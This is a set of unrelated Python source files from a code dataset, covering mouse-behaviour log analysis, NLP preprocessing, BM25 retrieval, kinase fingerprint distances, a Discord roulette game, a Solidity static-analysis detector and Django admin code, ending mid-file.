\n# datapath = '/Users/ubi/Projects/KOKI/VR/MiceData/'\n# #datapath = 'C:\\Users\\LN-Treadmill\\Desktop\\MouseData\\\\'\n# #datapath = 'C:\\Users\\Treadmill\\Desktop\\RitaNy_MouseData\\\\'\n\n# # date_time = '2019-11-28_19-37-04' # this was OK!\n# date_time = '2019-11-20_08-15-42' # this was not working!\n# # date_time = '2019-11-28_19-01-06' # this was OK!\n# # date_time = '2019-11-27_09-31-56' # this was OK!\n# # date_time = '2019-11-22_13-51-39' # this was OK!\n# name = 'th'\n# task = 'TwoMazes'\n# mm = Session(datapath, date_time, name, task)\n# #\n# #\n# ## # mm.Laps[181].plot_tx()\n# ## # mm.Laps[12].plot_xv()\n# mm.Laps[25].plot_txv()\n# mm.plot_session()\n\n\n# mm.Laps[17].plot_tx()\n# mm.Laps[17].plot_xv()\n# mm.Laps[55].plot_tx()\n# mm.Laps[55].plot_xv()\n\n\n# for i in range(65):\n#     mm.Laps[i].plot_tx()\n#     raw_input(\"Press Enter to 
continue...\")\n\n","sub_path":"LogAnal.py","file_name":"LogAnal.py","file_ext":"py","file_size_in_byte":28603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"638925383","text":"import argparse\nimport xnmt.vocabs as vocabs\nimport xnmt.input_readers as input_readers\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"input\")\nparser.add_argument(\"surface_vocab_file\")\nparser.add_argument(\"nt_vocab_file\")\nparser.add_argument(\"edg_vocab_file\")\nargs = parser.parse_args()\n\nreader = input_readers.CoNLLToRNNGActionsReader(surface_vocab=vocabs.Vocab(vocab_file=args.surface_vocab_file),\n nt_vocab=vocabs.Vocab(vocab_file=args.nt_vocab_file),\n edg_vocab=vocabs.Vocab(vocab_file=args.edg_vocab_file))\n\nfor tree in reader.read_sents(args.input):\n print(str(tree) + \" NONE()\")\n","sub_path":"script/parse/conll_to_actions.py","file_name":"conll_to_actions.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"344963902","text":"import argparse\nimport os\nfrom azureml.core import Run\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nimport scispacy\nimport spacy\nimport en_core_sci_lg\nfrom spacy_langdetect import LanguageDetector\n\n\nclass LangDetect:\n def __init__(self):\n self.run = Run.get_context()\n self.args = None\n self.df = None\n self.articles_in = 0\n self.articles_non_en = 0\n self.nlp = None\n\n self.get_runtime_arguments()\n\n self.load_dataset()\n self.set_nlp_model()\n\n self.collect_metrics_pre()\n self.lang_detect()\n self.log_metrics_post()\n\n self.output_dataset()\n\n def get_runtime_arguments(self):\n print('--- Get Runtime Arguments')\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--input',\n type=str,\n help='Input extract data'\n )\n parser.add_argument(\n '--output',\n type=str,\n help='Output extract data'\n )\n parser.add_argument(\n '--max_doc_length',\n type=int,\n help='Max doc length'\n )\n\n self.args = parser.parse_args()\n\n print('Input: {}'.format(self.args.input))\n print('Output: {}'.format(self.args.output))\n print('Max doc length: {}'.format(self.args.max_doc_length))\n\n def load_dataset(self):\n print('--- Load Data')\n path = self.args.input + \"/processed.csv\"\n self.df = pd.read_csv(path, dtype={\n 'paper_id': str,\n 'body_text': str,\n 'results': str,\n 'bibliography': str,\n 'subset_source': str,\n 'cord_uid': str,\n 'sha': str,\n 'source': str,\n 'title': str,\n 'doi': str,\n 'pubmed_id': str,\n 'abstract': str,\n 'publish_time': str,\n 'authors': str,\n 'journal': str,\n 'url': str})\n\n print('Raw Input Specifications')\n print(self.df.head())\n print(self.df.columns)\n print(self.df.shape)\n\n def set_nlp_model(self):\n print('--- Set NLP Model')\n self.nlp = en_core_sci_lg.load(disable=['tagger', 'ner'])\n self.nlp.max_length = 1000000\n self.nlp.add_pipe(LanguageDetector(), name='language_detector', last=True)\n\n def detect_article_lang(self):\n print('--- Detect Article Language')\n self.df['text_language'] = self.df.body_text.apply(lambda x: self.nlp(str(x[:int(self.args.max_doc_length)]))._.language['language'])\n articles_by_lang = self.df['text_language'].value_counts()\n print(articles_by_lang)\n\n self.articles_non_en = self.df.loc[self.df[self.df.text_language != 'en'].index].shape\n print('Number of non-english articles: {}'.format(str(self.articles_non_en)))\n\n df_temp = 
pd.DataFrame({'language': articles_by_lang.index, 'Count': articles_by_lang.values})\n        df_temp.sort_values(by=['Count'], inplace=True)\n\n        fig_name = 'Articles by Lang'\n        fig, ax = plt.subplots(figsize=(20, 10))\n        sns.barplot(x='language', y='Count', data=df_temp, palette='husl')\n        plt.xlabel('Language', fontsize=24)\n        plt.ylabel('Articles', fontsize=24)\n        ax.tick_params(axis='both', which='major', labelsize=20)\n        self.run.log_image(fig_name, plot=fig)\n        self.offline_save_fig(fig_name)\n        plt.close()\n\n    def offline_save_fig(self, name):\n        if 'OfflineRun' in self.run._identity:\n            full_path = 'plots/' + name + '.png'\n            plt.savefig(full_path, dpi=300, format='png')\n\n    def drop_non_english_articles(self):\n        print('--- Drop Non-English Articles')\n        self.df = self.df.drop(self.df[self.df.text_language != 'en'].index)\n        print('Number remaining English language articles: {}'.format(str(self.df.shape[0])))\n\n    def lang_detect(self):\n        self.detect_article_lang()\n        self.drop_non_english_articles()\n\n    def collect_metrics_pre(self):\n        self.articles_in = len(self.df)\n\n    def log_metrics_post(self):\n        self.run.log('# Articles In', self.articles_in)\n        self.run.log('# Articles Non-En', self.articles_non_en)\n        self.run.log('# Articles Out', len(self.df))\n\n    def output_dataset(self):\n        print('--- Output Dataset')\n        self.df.drop(columns=['text_language'], inplace=True)\n        if not (self.args.output is None):\n            os.makedirs(self.args.output, exist_ok=True)\n            path = self.args.output + \"/processed.csv\"\n            self.df.to_csv(path, index=False)\n            print('Output created: {}'.format(path))\n            print('Column definition of output')\n            print(self.df.columns)\n\n\nif __name__ == \"__main__\":\n    print('--- Language Detection Started')\n    lang_detect = LangDetect()\n    print('--- Language Detection Completed')","sub_path":"code/dataprep/cord19/step_dataprep_lang_detect.py","file_name":"step_dataprep_lang_detect.py","file_ext":"py","file_size_in_byte":4937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69226405","text":"import math\nimport xlwt\n\nimport utils\nimport numpy as np\n\n\nclass BM25(object):\n\n    def __init__(self, docs, docs_raw):\n        self.docs_raw = docs_raw # raw document list containing id, title, subject, description\n        self.docs = docs # list of documents, already tokenized\n        self.docs_num = len(docs) # total number of documents\n        self.avgdl = sum([len(doc) + 0.0 for doc in docs]) / self.docs_num # average number of words per document\n        self.docs_f = [] # per-document term counts (one dict per document)\n        self.df = {} # for every word, the number of documents containing it\n        self.idf = {} # idf value of every word: log( (docs_num - df[word] + 0.5) / (df[word] + 0.5) )\n        self.k1 = 1.5 # tuning parameter\n        self.b = 0.75 # tuning parameter\n        self.init()\n\n    # initialization: compute docs_f, df and idf\n    def init(self):\n        for doc in self.docs:\n            # count the occurrences of each word in this document\n            doc_f = {}\n            for word in doc:\n                doc_f[word] = doc_f.get(word, 0) + 1\n            self.docs_f.append(doc_f)\n            # compute df\n            for word in doc_f.keys():\n                self.df[word] = self.df.get(word, 0) + 1\n        # compute idf\n        for word, word_df in self.df.items():\n            self.idf[word] = math.log(self.docs_num - word_df + 0.5) - math.log(word_df + 0.5)\n\n    # compute the similarity score between query q and the document at position index (q is a list of tokens)\n    def bm25_score(self, q, index):\n        # all words contained in this document and their frequencies\n        doc_f = self.docs_f[index]\n        # total number of words in this document\n        dl = len(self.docs[index])\n        # accumulated relevance score\n        score = 0\n        for word in q:\n            if word not in doc_f:\n                # the document does not contain this word\n                continue\n            else:\n                # the document contains this word: compute and accumulate the relevance score (idf(word) * f(word) * (k1+1)) / (f(word) + k1 * (1-b+b*(dl/avgdl)))\n                score += (self.idf[word] * doc_f[word] * (self.k1 + 1)\n                          / (doc_f[word] + self.k1 * (1 - self.b + self.b * dl / self.avgdl)))\n        return score\n\n    # compute all similarity scores and write the top n results to an excel file\n    def bm25_score_all(self, q_raw, file_name, n=100000):\n        # preprocess the query\n        q = utils.pretreatment(q_raw)\n        print('q_raw:', q_raw)\n        print('q:', q)\n\n        # compute the similarity between the query and every document\n        scores = []\n        for index in range(self.docs_num):\n            score = self.bm25_score(q, index)\n            scores.append(score)\n        scores = np.array(scores)\n\n        # argsort sorts the array; passing -scores sorts in descending order and returns the indices of the sorted original array [index of the largest value, second largest, ...]\n        scores_sort_index = np.argsort(-scores)\n        # save to bm_result.xls\n        workbook = xlwt.Workbook(encoding=\"utf-8\")\n        sheet = workbook.add_sheet(\"sim_result\")\n        # column 1: id\n        sheet.write(0, 0, 'id')\n        # column 2: similarity score\n        sheet.write(0, 1, 'sim_score')\n        # column 3: id\n        sheet.write(0, 2, 'id')\n        # column 4: title\n        sheet.write(0, 3, 'title')\n        # column 5: subject\n        sheet.write(0, 4, 'subject')\n        # column 6: description\n        sheet.write(0, 5, 'description')\n        for i in range(len(scores)):\n            if i < n and scores[scores_sort_index[i]] > 0:\n                doc = bm25.docs_raw[scores_sort_index[i]]\n                # column 1: id\n                sheet.write(i + 1, 0, str(scores_sort_index[i]+1))\n                # column 2: similarity score\n                sheet.write(i + 1, 1, scores[scores_sort_index[i]])\n                # column 3: id\n                sheet.write(i + 1, 2, doc[0])\n                # column 4: title\n                sheet.write(i + 1, 3, doc[1])\n                # column 5: subject\n                sheet.write(i + 1, 4, doc[2])\n                # column 6: description\n                sheet.write(i + 1, 5, doc[3])\n            else:\n                break\n        workbook.save(file_name)\n\n\n# initialize the bm25 model (class) and save it to the bm25.pkl file\ndef bm25_init():\n    # read the database\n    docs_raw = utils.readDb([\"id\", 'title', 'subject', 'description'])\n    # preprocessing\n    docs = []\n    for doc in docs_raw:\n        doc_str = ''\n        # merge title, subject and description according to their weights\n        # title\n        for i in range(5):\n            doc_str += doc[1]\n        # subject\n        for i in range(3):\n            doc_str += doc[2]\n        # description\n        for i in range(1):\n            doc_str += doc[3]\n        # preprocess (tokenize, remove stopwords)\n        doc_words = utils.pretreatment(doc_str)\n        docs.append(doc_words)\n        # if len(docs) > 1000:\n        #     break\n    bm25 = BM25(docs, docs_raw)\n    # save the bm25 model (class) to the bm25.pkl file\n    utils.save_model('bm/bm25.pkl', bm25)\n\n\nif __name__ == '__main__':\n\n    # initialize the bm25 model (class) and save it to the bm25.pkl file\n    # bm25_init()\n\n    # load the bm25 model class from the bm25.pkl file\n    bm25 = utils.read_model('bm25.pkl')\n\n    # query\n    q_raw = '农村居民人均可支配收入'\n\n    # compute similarities with bm25 and write the results\n    bm25.bm25_score_all(q_raw, 'bm_result.xls', 1000)\n","sub_path":"bm/bm.py","file_name":"bm.py","file_ext":"py","file_size_in_byte":5400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"145207543","text":"\"\"\"\nkissim.comparison.fingerprint_distance_generator\n\nDefines the pairwise fingerprint distances for a set of fingerprints.\n\"\"\"\n\nimport datetime\nfrom itertools import repeat\nimport logging\nfrom multiprocessing import cpu_count, Pool\n\nimport numpy as np\nimport pandas as pd\n\nfrom . 
import FingerprintDistance\n\nlogger = logging.getLogger(__name__)\n\n\nclass FingerprintDistanceGenerator:\n \"\"\"\n Generate fingerprint distances for multiple fingerprint pairs based on their feature distances,\n given a feature weighting scheme.\n Uses parallel computing of fingerprint pairs.\n\n Attributes\n ----------\n distance_measure : str\n Type of distance measure, defaults to scaled Euclidean distance.\n molecule_codes : list of str\n Unique molecule codes associated with all fingerprints (sorted alphabetically).\n kinase_names : list of str\n Unique kinase names associated with all fingerprints (sorted alphabetically).\n feature_weights : None or list of float\n Feature weights of the following form:\n (i) None\n Default feature weights: All features equally distributed to 1/15\n (15 features in total).\n (ii) By feature type (list of 3 floats)\n Feature types to be set in the following order: physicochemical, distances, and\n moments.\n (iii) By feature (list of 15 floats):\n Features to be set in the following order: size, hbd, hba, charge, aromatic, aliphatic,\n sco, exposure,\n distance_to_centroid, distance_to_hinge_region, distance_to_dfg_region,\n distance_to_front_pocket, moment1, moment2, and moment3.\n For (ii) and (iii): All floats must sum up to 1.0.\n data : pandas.DataFrame\n Fingerprint distance and coverage, plus details on both molecule codes associated with\n fingerprint pairs.\n \"\"\"\n\n def __init__(self):\n\n self.distance_measure = None\n self.feature_weights = None\n self.molecule_codes = None\n self.kinase_names = None\n self.data = None\n\n def from_feature_distances_generator(self, feature_distances_generator, feature_weights=None):\n \"\"\"\n Generate fingerprint distances for multiple fingerprint pairs based on their feature\n distances, given a feature weighting scheme.\n Uses parallel computing of fingerprint pairs.\n\n Parameters\n ----------\n feature_distances_generator : kissim.similarity.FeatureDistancesGenerator\n Feature distances for multiple fingerprint pairs.\n feature_weights : None or list of float\n Feature weights of the following form:\n (i) None\n Default feature weights: All features equally distributed to 1/15\n (15 features in total).\n (ii) By feature type (list of 3 floats)\n Feature types to be set in the following order: physicochemical, distances, and\n moments.\n (iii) By feature (list of 15 floats):\n Features to be set in the following order: size, hbd, hba, charge, aromatic,\n aliphatic, sco, exposure, distance_to_centroid, distance_to_hinge_region,\n distance_to_dfg_region, distance_to_front_pocket, moment1, moment2, and moment3.\n For (ii) and (iii): All floats must sum up to 1.0.\n \"\"\"\n\n start = datetime.datetime.now()\n\n logger.info(f\"SIMILARITY: FingerprintDistanceGenerator: {feature_weights}\")\n\n # Set class attributes\n self.distance_measure = feature_distances_generator.distance_measure\n self.feature_weights = feature_weights\n self.molecule_codes = feature_distances_generator.molecule_codes\n self.kinase_names = feature_distances_generator.kinase_names\n\n # Calculate pairwise fingerprint distances\n fingerprint_distance_list = self._get_fingerprint_distance_from_list(\n self._get_fingerprint_distance,\n list(feature_distances_generator.data.values()),\n self.feature_weights,\n )\n\n # Format result and save to class attribute\n self.data = pd.DataFrame(\n [\n [i.molecule_pair_code[0], i.molecule_pair_code[1], i.distance, i.bit_coverage]\n for i in fingerprint_distance_list\n ],\n 
columns=\"molecule_code_1 molecule_code_2 distance coverage\".split(),\n )\n\n end = datetime.datetime.now()\n\n logger.info(f\"Start of fingerprint distance generation: {start}\")\n logger.info(f\"End of fingerprint distance generation: {end}\")\n\n @staticmethod\n def _get_fingerprint_distance_from_list(\n _get_fingerprint_distance, feature_distances_list, feature_weights=None\n ):\n \"\"\"\n Get fingerprint distances based on multiple feature distances\n (i.e. for multiple fingerprint pairs).\n Uses parallel computing.\n\n Parameters\n ----------\n _get_fingerprint_distance : method\n Method calculating fingerprint distance for one fingerprint pair\n (based on their feature distances).\n feature_distances_list : list of kissim.similarity.FeatureDistances\n List of distances and bit coverages between two fingerprints for each of their\n features.\n feature_weights : None or list of float\n Feature weights of the following form:\n (i) None\n Default feature weights: All features equally distributed to 1/15\n (15 features in total).\n (ii) By feature type (list of 3 floats)\n Feature types to be set in the following order: physicochemical, distances, and\n moments.\n (iii) By feature (list of 15 floats):\n Features to be set in the following order: size, hbd, hba, charge, aromatic,\n aliphatic, sco, exposure, distance_to_centroid, distance_to_hinge_region,\n distance_to_dfg_region, distance_to_front_pocket, moment1, moment2, and moment3.\n For (ii) and (iii): All floats must sum up to 1.0.\n\n Returns\n -------\n list of kissim.similarity.FingerprintDistance\n List of distance between two fingerprints, plus details on molecule codes, feature\n weights and feature coverage.\n \"\"\"\n\n # Get start time of computation\n start = datetime.datetime.now()\n logger.info(f\"Calculate pairwise fingerprint distances...\")\n\n # Number of CPUs on machine\n num_cores = cpu_count() - 1\n logger.info(f\"Number of cores used: {num_cores}\")\n\n # Create pool with `num_processes` processes\n pool = Pool(processes=num_cores)\n\n # Apply function to each chunk in list\n fingerprint_distances_list = pool.starmap(\n _get_fingerprint_distance, zip(feature_distances_list, repeat(feature_weights))\n )\n\n # Close and join pool\n pool.close()\n pool.join()\n\n # Get end time of computation\n logger.info(f\"Number of fingerprint distances: {len(fingerprint_distances_list)}\")\n end = datetime.datetime.now()\n\n logger.info(f\"Start: {start}\")\n logger.info(f\"End: {end}\")\n\n return fingerprint_distances_list\n\n @staticmethod\n def _get_fingerprint_distance(feature_distances, feature_weights=None):\n \"\"\"\n Get the fingerprint distance for one fingerprint pair.\n\n Parameters\n ----------\n feature_distances : kissim.similarity.FeatureDistances\n Distances and bit coverages between two fingerprints for each of their features.\n feature_weights : None or list of float\n Feature weights of the following form:\n (i) None\n Default feature weights: All features equally distributed to 1/15\n (15 features in total).\n (ii) By feature type (list of 3 floats)\n Feature types to be set in the following order: physicochemical, distances, and\n moments.\n (iii) By feature (list of 15 floats):\n Features to be set in the following order: size, hbd, hba, charge, aromatic,\n aliphatic, sco, exposure, distance_to_centroid, distance_to_hinge_region,\n distance_to_dfg_region, distance_to_front_pocket, moment1, moment2, and moment3.\n For (ii) and (iii): All floats must sum up to 1.0.\n\n Returns\n -------\n 
kissim.similarity.FingerprintDistance\n Distance between two fingerprints, plus details on molecule codes, feature weights and\n feature coverage.\n \"\"\"\n\n fingerprint_distance = FingerprintDistance()\n fingerprint_distance.from_feature_distances(feature_distances, feature_weights)\n\n return fingerprint_distance\n\n def get_structure_distance_matrix(self, fill=False):\n \"\"\"\n Get fingerprint distances for all structure pairs in the form of a matrix (DataFrame).\n\n Parameters\n ----------\n fill : bool\n Fill or fill not (default) lower triangle of distance matrix.\n\n Returns\n -------\n pandas.DataFrame\n Structure distance matrix.\n \"\"\"\n\n # Initialize matrix\n structure_distance_matrix = pd.DataFrame(\n [], columns=self.molecule_codes, index=self.molecule_codes, dtype=float\n )\n\n # Fill matrix with distance values\n for index, row in self.data.iterrows():\n structure_distance_matrix.loc[row.molecule_code_1, row.molecule_code_2] = row.distance\n\n if fill:\n structure_distance_matrix.loc[\n row.molecule_code_2, row.molecule_code_1\n ] = row.distance\n\n # Fill values on matrix main diagonal to 0.0\n for molecule_code in self.molecule_codes:\n structure_distance_matrix.loc[molecule_code, molecule_code] = 0.0\n\n return structure_distance_matrix\n\n def get_kinase_distance_matrix(self, by=\"minimum\", fill=False):\n \"\"\"\n Extract per kinase pair one distance value from the set of structure pair distance values\n and return these fingerprint distances for all kinase pairs in the form of a matrix\n (DataFrame).\n\n Parameters\n ----------\n by : str\n Condition on which the distance value per kinase pair is extracted from the set of\n distances values per structure pair. Default: Minimum distance value.\n fill : bool\n Fill or fill not (default) lower triangle of distance matrix.\n\n Returns\n -------\n pandas.DataFrame\n Kinase distance matrix.\n \"\"\"\n\n # Initialize matrix\n kinase_distance_matrix = pd.DataFrame(\n [], columns=self.kinase_names, index=self.kinase_names, dtype=float\n )\n\n # Fill matrix with distance values\n for index, row in self._get_kinase_distances(by).iterrows():\n kinase_distance_matrix.loc[index[0], index[1]] = row.distance\n\n if fill:\n kinase_distance_matrix.loc[index[1], index[0]] = row.distance\n\n # Fill values on matrix main diagonal to 0.0 which are NaN\n # (i.e. kinases that have only one structure representative)\n for kinase_name in self.kinase_names:\n if np.isnan(kinase_distance_matrix.loc[kinase_name, kinase_name]):\n kinase_distance_matrix.loc[kinase_name, kinase_name] = 0.0\n\n return kinase_distance_matrix\n\n def _get_kinase_distances(self, by=\"minimum\"):\n \"\"\"\n Extract per kinase pair one distance value from the set of structure pair distance values.\n\n Parameters\n ----------\n by : str\n Condition on which the distance value per kinase pair is extracted from the set of\n distances values per structure pair. 
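`get_structure_distance_matrix` fills the matrix row by row; a compact alternative sketch (an assumption, not kissim's code) that builds the same symmetric layout with a pandas pivot:

```python
# Build a symmetric distance matrix from long-format pairwise rows.
import pandas as pd

data = pd.DataFrame(
    {"molecule_code_1": ["a", "a", "b"],
     "molecule_code_2": ["b", "c", "c"],
     "distance": [0.1, 0.2, 0.3]}
)
codes = sorted(set(data.molecule_code_1) | set(data.molecule_code_2))
matrix = data.pivot(index="molecule_code_1", columns="molecule_code_2",
                    values="distance").reindex(index=codes, columns=codes)
matrix = matrix.combine_first(matrix.T)      # mirror the filled triangle
for code in codes:
    matrix.loc[code, code] = 0.0             # self-distance is zero
print(matrix)
```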
Default: Minimum distance value.\n\n Returns\n -------\n pandas.DataFrame\n Fingerprint distance and coverage for kinase pairs.\n \"\"\"\n\n # Get distance values for structure pairs\n structure_distances = self._add_kinases_to_fingerprint_distance()\n\n # Group by kinase names\n structure_distances_grouped_by_kinases = structure_distances.groupby(\n by=[\"kinase_1\", \"kinase_2\"], sort=False\n )\n\n # Get distance values per kinase pair based on given condition\n by_terms = \"minimum maximum mean size\".split()\n\n if by == \"minimum\":\n kinase_distances = structure_distances_grouped_by_kinases.min()\n elif by == \"maximum\":\n kinase_distances = structure_distances_grouped_by_kinases.max()\n elif by == \"mean\":\n kinase_distances = structure_distances_grouped_by_kinases.mean()\n elif by == \"size\":\n kinase_distances = structure_distances_grouped_by_kinases.size()\n else:\n raise ValueError(f'Condition \"by\" unknown. Choose from: {\", \".join(by_terms)}')\n\n return kinase_distances\n\n def _add_kinases_to_fingerprint_distance(self):\n \"\"\"\n Add two columns to fingerprint distances for kinase 1 name and kinase 2 name.\n\n Returns\n -------\n pandas.DataFrame\n Fingerprint distance and coverage, plus details on both molecule codes and kinase names\n associated with fingerprint pairs.\n \"\"\"\n\n # Make a copy of distance values per structure pairs\n fingerprint_distance = self.data.copy()\n\n # Add columns for kinase names (kinase pair)\n fingerprint_distance[\"kinase_1\"] = [\n i.split(\"/\")[1].split(\"_\")[0] for i in fingerprint_distance.molecule_code_1\n ]\n fingerprint_distance[\"kinase_2\"] = [\n i.split(\"/\")[1].split(\"_\")[0] for i in fingerprint_distance.molecule_code_2\n ]\n\n return fingerprint_distance\n","sub_path":"kissim/comparison/fingerprint_distance_generator.py","file_name":"fingerprint_distance_generator.py","file_ext":"py","file_size_in_byte":13962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"610458197","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef open_url(keyword):\n payload = {'q':keyword,'sort':'sale-desc'}\n url = 'https://s.taobao.com/search'\n headers = {'user-agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\n\n res = requests.get(url, params=payload, headers=headers)\n return res\n\ndef main():\n keyword = input('请输入关键词:')\n res = open_url(keyword)\n\n with open(\"items.txt\",'wt',encoding='utf-8') as f:\n f.write(res.text)\n\nif __name__ == '__main__':\n main()\n","sub_path":"淘宝/sales.py","file_name":"sales.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"226388409","text":"from fortress.detectors.abstract_detector import AbstractDetector, DetectorClassification\nfrom fortress.slithir.operations import Nop\n\n\nclass VoidConstructor(AbstractDetector):\n\n ARGUMENT = \"void-cst\"\n HELP = \"Constructor called not implemented\"\n IMPACT = DetectorClassification.LOW\n CONFIDENCE = DetectorClassification.HIGH\n\n WIKI = \"https://github.com/crytic/fortress/wiki/Detector-Documentation#void-constructor\"\n\n WIKI_TITLE = \"Void constructor\"\n WIKI_DESCRIPTION = \"Detect the call to a constructor that is not implemented\"\n WIKI_RECOMMENDATION = \"Remove the constructor call.\"\n WIKI_EXPLOIT_SCENARIO = \"\"\"\n```solidity\ncontract A{}\ncontract B is A{\n constructor() public A(){}\n}\n```\nWhen reading `B`'s 
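The `by` dispatch in `_get_kinase_distances` maps a condition name to a groupby aggregation; the same behavior, table-driven, on a toy frame:

```python
import pandas as pd

df = pd.DataFrame({"kinase_1": ["A", "A"], "kinase_2": ["B", "B"],
                   "distance": [0.4, 0.2]})
grouped = df.groupby(["kinase_1", "kinase_2"], sort=False)

aggregations = {"minimum": "min", "maximum": "max", "mean": "mean", "size": "size"}
by = "minimum"
if by not in aggregations:
    raise ValueError(f'Condition "by" unknown. Choose from: {", ".join(aggregations)}')
print(grouped.size() if by == "size" else grouped.agg(aggregations[by]))
```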
constructor definition, we might assume that `A()` initiates the contract, but no code is executed.\"\"\"\n\n def _detect(self):\n \"\"\"\"\"\"\n results = []\n for c in self.contracts:\n cst = c.constructor\n if cst:\n\n for constructor_call in cst.explicit_base_constructor_calls_statements:\n for node in constructor_call.nodes:\n if any(isinstance(ir, Nop) for ir in node.irs):\n info = [\"Void constructor called in \", cst, \":\\n\"]\n info += [\"\\t- \", node, \"\\n\"]\n\n res = self.generate_result(info)\n\n results.append(res)\n return results\n","sub_path":"fortress/detectors/operations/void_constructor.py","file_name":"void_constructor.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"14589071","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import has_permissions\nimport time\nimport random\nfrom random import randint\n\nmembers_list = []\n\nclass Roulette(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n\n @has_permissions(administrator=True)\n @commands.command()\n async def rr(self, ctx, add, member : discord.Member = None):\n\n self.add = \"add\"\n message_author = ctx.message.author.display_name\n\n if not member:\n await ctx.send(\"Tu dois renseigner un joueur !\")\n elif not member.display_name in members_list:\n\n members_list.append(member.display_name)\n print(members_list)\n await ctx.send(f'{member.display_name} a bien été ajouté à la liste de participants !')\n await ctx.send(f'Liste de joueurs : {members_list}, Taille de la liste : {len(members_list)}')\n\n @has_permissions(administrator=True)\n @commands.command()\n async def rrstart(self, ctx):\n\n if len(members_list) <= 1:\n await ctx.send(\"Il n'y a pas assez de participants !\")\n return\n\n timer = 5\n\n while timer != 0:\n\n await ctx.send(f'La roulette russe commence dans : {timer}')\n\n time.sleep(1)\n\n timer -= 1\n\n if timer == 0:\n while len(members_list) != 1:\n await ctx.send(\"Here we go! :ye:\")\n await ctx.send(\"Qui aura droit au chatiment divin ? :pensive:\")\n time.sleep(20)\n member_dead = members_list[randint(0, len(members_list)-1)]\n await ctx.send(f'Aïe | ||**{member_dead}**|| est mort.') \n members_list.remove(member_dead)\n await ctx.send(f'**Joueurs restants | {members_list}')\n time.sleep(15)\n\n if len(members_list) == 1:\n await ctx.send(f'Roulette Russe | **{members_list[0]}** a gagné la partie ! 
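The elimination loop in `rrstart` reduces to one core idea: remove a uniformly random player per round until one remains. A sketch without the Discord plumbing:

```python
# Same effect as indexing with randint(0, len(members_list) - 1).
import random

players = ["alice", "bob", "carol"]
while len(players) > 1:
    eliminated = random.choice(players)
    players.remove(eliminated)
    print(f"{eliminated} is out, remaining: {players}")
print(f"winner: {players[0]}")
```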
@here')\n\n\n\ndef setup(client):\n client.add_cog(Roulette(client))","sub_path":"cogs/roulette_russe.py","file_name":"roulette_russe.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"210464902","text":"from django.contrib import admin\nfrom .forms import CustomUserCreationForm\nfrom django.utils.html import format_html\nfrom hospital.models import Hospital\nfrom vehicle.models import Vehicle,VehicleCategory\nfrom django.urls import path\nfrom django.conf.urls import include, url\nfrom django.http import HttpResponse\nfrom django.template.response import TemplateResponse\nfrom django.utils.translation import gettext, gettext_lazy as _\nfrom django.utils.translation import ugettext_lazy\nfrom user.admin import admin_site\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.apps import apps\nclass HospitalAdmin(admin.ModelAdmin):\n list_display_links = None\n change_form_template = 'admin/hospital/change_form.html'\n change_list_template = 'admin/hospital/change_list.html'\n form = CustomUserCreationForm\n model = Hospital\n list_display = ('full_name','email', 'phone','address','status','Action')\n list_filter = ('status',)\n list_per_page = 5 #For Pagination\n\n fieldsets = (\n (None, {'fields': ('full_name','email','phone','address','status','password')}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('full_name','email','phone','status','password', 'is_active')}\n ),\n )\n search_fields = ('email',)\n ordering = ('-id',)\n \n def Action(self, obj):\n if(obj.status == 3):\n delete = ''\n edit = ''\n add = ''\n else: \n delete = ' ' % (\n obj.id, obj.id)\n add = ' ' % (\n obj.id)\n edit = ' ' % (obj.id,obj.id)\n\n view = ' ' % (\n obj.id)\n \n return format_html(view + delete + edit + add)\n \n def get_urls(self):\n urls = super().get_urls()\n my_urls = [\n url('^view/(?P\\d+)/$', self.hospital_view),\n url('^add_vehicle/(?P\\d+)/$', self.vehicle_add),\n ]\n return my_urls + urls\n \n def extra_context(self, request):\n context = admin_site.each_context(request)\n context['opts'] = Hospital._meta\n context['site_title'] = ugettext_lazy('Hospital')\n return context\n\n\n @method_decorator(login_required())\n def vehicle_add(self, request,hospital_id):\n context = self.extra_context(request)\n context['title'] = 'Add Vehicle'\n context['data'] = Hospital.objects.get(id=hospital_id)\n context['category'] = VehicleCategory.objects.all()\n return TemplateResponse(request, 'admin/hospital/add_vehicle.html', context=context)\n\n @method_decorator(login_required())\n def hospital_view(self, request,hospital_id):\n context = self.extra_context(request)\n context['title'] = 'Hospital User Details'\n context['userDetail'] = Hospital.objects.get(id=hospital_id)\n context['Vehicle'] = Vehicle.objects.filter(user_id = hospital_id).filter(user_type = 1)\n context['site_title'] = ugettext_lazy('Hospital')\n return TemplateResponse(request, 'admin/hospital_view.html', context=context)\n\nadmin_site.register(Hospital,HospitalAdmin)\n","sub_path":"gelmeko/hospital/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"177087716","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom 
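The `Action` column above assembles HTML with `%` interpolation before passing it to `format_html`. A sketch (an assumption, not the project's code) of the placeholder form, which lets `format_html` escape its arguments; the URL here is illustrative:

```python
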